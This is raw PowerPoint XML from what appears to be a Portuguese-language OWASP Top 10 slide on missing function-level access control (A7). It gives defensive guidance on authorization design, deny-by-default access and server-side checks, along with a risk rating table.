              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Externas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId11"/>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12"/>
              </a:rPr>
              <a:t>CWE Entry 285 on Improper Access Control (Authorization)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="3635896"/>
            <a:ext cx="3383280" cy="2688704"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Como faço para evitar? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sua aplicação deveria ter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>um módulo de autorização consistente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e fácil de analisar que seja chamado por todas as suas funções de negócio. Frequentemente, tal proteção é fornecida por um ou mais componentes externos ao código da aplicação. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pense sobre o processo para gerenciar os direitos e garantir que você possa atualizar e auditar facilmente. Não codifique diretamente. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A execução de mecanismos deve negar todo o acesso por padrão, exigindo direitos explícitos para papéis específicos no acesso a todas as funções.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Se a função está envolvida em um fluxo de trabalho, verifique, para ter certeza, se as condições estão em estado adequado para permitir acesso. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOTA: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Muitas das aplicações web não mostram links e botões para funções não autorizadas, mas esse "controle de acesso na camada de apresentação" na verdade não fornece proteção. Você </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>também</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> deve implementar verificações na lógica do controlador ou do negócio.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>Falta de Função </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>para Controle do Nível de Acesso</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A7</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 26"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="15159" y="1014413"/>
            <a:ext cx="6669804" cy="525268"/>
            <a:chOff x="14975" y="1014596"/>
            <a:chExt cx="6670153" cy="525104"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="33" name="Group 28"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="14975" y="1014596"/>
              <a:ext cx="6670153" cy="525104"/>
              <a:chOff x="14975" y="997424"/>
              <a:chExt cx="6670153" cy="525104"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2879691" y="1073600"/>
                <a:ext cx="1020816" cy="380881"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vulnerabilidades</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t/>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>        de Segurança</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="37" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="145" y="1344"/>
                  <a:ext cx="190" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050" algn="ctr">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>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48" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>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49" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>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65" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1633"/>
                  <a:ext cx="288" cy="0"/>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grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1309572" y="1078361"/>
                <a:ext cx="838244" cy="357076"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrowCallout">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 20889"/>
                  <a:gd name="adj2" fmla="val 24667"/>
                  <a:gd name="adj3" fmla="val 34667"/>
                  <a:gd name="adj4" fmla="val 8013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Vetores </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> de Ataque</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800666" y="1049795"/>
                <a:ext cx="685836" cy="428491"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 250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Impactos</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>  Técnicos</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="40" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="761855" y="1262453"/>
                <a:ext cx="535016" cy="1588"/>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41" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2189093" y="1262453"/>
                <a:ext cx="630270" cy="1588"/>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42" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="36" idx="3"/>
                <a:endCxn id="39" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3900507" y="1264041"/>
                <a:ext cx="900159"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sp>
            <p:nvSpPr>
              <p:cNvPr id="43" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="14975" y="1322855"/>
                <a:ext cx="1132100" cy="199673"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Agentes </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>de </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Ameaça</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923088" y="1073600"/>
                <a:ext cx="762040" cy="380881"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impactos</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>no Negócio</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="45" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="39" idx="4"/>
                <a:endCxn id="44" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486502" y="1264041"/>
                <a:ext cx="436586"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
          <p:nvSpPr>
            <p:cNvPr id="34" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879691" y="1090772"/>
              <a:ext cx="220675" cy="380881"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 47538"/>
                <a:gd name="adj2" fmla="val 51293"/>
                <a:gd name="adj3" fmla="val 57006"/>
                <a:gd name="adj4" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>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endParaRPr lang="pt-BR" sz="900" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2862228" y="1235189"/>
              <a:ext cx="109543" cy="9522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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23723364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5" name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1284256201"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="951722"/>
          <a:ext cx="6858000" cy="2736358"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1066800"/>
                <a:gridCol w="1219200"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="572278">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a:p>
                  </a:txBody>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4572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000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico da </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicaçã</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>o</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="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b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploração</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MÉDIO</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914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Prevalência</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>COMUM</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914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Detecção</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>FÁCIL</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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1000" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Impacto</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERADO</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baseline="0" dirty="0" smtClean="0">
